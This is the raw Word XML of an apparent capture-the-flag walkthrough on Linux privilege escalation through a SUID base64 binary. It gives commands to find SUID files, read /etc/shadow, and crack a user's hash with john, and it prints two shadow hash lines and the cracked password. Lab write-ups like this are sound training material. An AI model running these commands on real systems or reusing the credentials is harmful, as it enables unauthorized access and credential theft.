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509" w:rsidRDefault="00F452E4">
      <w:r>
        <w:t>Search for the binaries with SUID sets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r w:rsidRPr="00F452E4">
        <w:t>find / -type f -perm -04000 -ls 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r>
        <w:t>use base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r w:rsidRPr="00F452E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3460F185" wp14:editId="74B718D0">
            <wp:extent cx="5943600" cy="1164590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24725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5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E4" w:rsidRDefault="00F452E4">
      <w:r>
        <w:t xml:space="preserve">Look through the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B9338B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/#+suid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r w:rsidRPr="00F452E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5745231F" wp14:editId="37230C95">
            <wp:extent cx="5219968" cy="1968601"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196547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5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E4" w:rsidRDefault="00F452E4"/>
    <w:p w:rsidR="00F452E4" w:rsidRPr="00F452E4" w:rsidRDefault="00F452E4" w:rsidP="00F452E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t xml:space="preserve"> install -m =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t xml:space="preserve"> $(which base64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>) .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRPr="00F452E4" w:rsidRDefault="00F452E4" w:rsidP="00F452E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRPr="00F452E4" w:rsidRDefault="00F452E4" w:rsidP="00F452E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F452E4">
        <w:t>LFILE=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>file_to_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRPr="00F452E4" w:rsidRDefault="00F452E4" w:rsidP="00F452E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>base64 "$LFILE" | base64 --decode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r w:rsidRPr="00F452E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64598E9E" wp14:editId="4AB67A6E">
            <wp:extent cx="5943600" cy="2080895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20768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7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E4" w:rsidRDefault="00F452E4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use command LFILE=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:r>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidRPr="00F452E4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t xml:space="preserve">/bin/base64 "$LFILE" | base64 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F452E4">
        <w:t>decode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>leonard:$6$JELumeiiJFPMFj3X$OXKY.N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>8LDHHTtF5Q/pTCsWbZtO6SfAzEQ6UkeFJy.Kx5C9rXFuPr.8n3v7TbZEttkGKCVj50KavJNAm7ZjRi4/::0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>missy:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F452E4">
        <w:t>6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4"/>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:t>create a file called missy on your attacker machine and copy and paste the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B90662" wp14:editId="7396BE11">
            <wp:extent cx="5943600" cy="497840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123683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1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5" w:rsidRDefault="00A82BF5"/>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:t>Use john tool to crack the hash to get the password for missy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82BF5">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82BF5">
        <w:t xml:space="preserve">/share/wordlists/rockyou.txt --users=missy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82BF5">
        <w:t>missy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A7BA3FD" wp14:editId="1FB88AB1">
            <wp:extent cx="5943600" cy="2046605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="186077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71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5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:t xml:space="preserve">The password was </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BF5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Password1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:t xml:space="preserve">Find the other use with base64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D209471" wp14:editId="68523AF4">
            <wp:extent cx="2978303" cy="349268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13002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5" w:rsidRDefault="00A82BF5"/>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:t xml:space="preserve">Run the LFILE command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E922D10" wp14:editId="62F9857A">
            <wp:extent cx="5543835" cy="234962"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12656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5" w:rsidRDefault="00A82BF5"/>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5"/>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use the base64 and LFILE command decoder and you will get the flag2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82BF5" w:rsidRDefault="00A82BF5">
      <w:r w:rsidRPr="00A82BF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1EDFC0" wp14:editId="7FF91477">
            <wp:extent cx="5943600" cy="367665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17802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3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5" w:rsidRDefault="00A82BF5"/>
    <w:p w:rsidR="00F452E4" w:rsidRDefault="00F452E4"/>
    <w:sectPr w:rsidR="00F4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B11E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22C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8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E4"/>
    <w:rsid w:val="00821509"/>
    <w:rsid w:val="00865067"/>
    <w:rsid w:val="00A82BF5"/>
    <w:rsid w:val="00D018D8"/>
    <w:rsid w:val="00E26237"/>
    <w:rsid w:val="00F452E4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758A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ABFEF914-2D11-4BEA-AC5A-8950DB33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2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fobins.github.io/#+su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Beacham</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Courtney Beacham</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-23T06:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T06:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>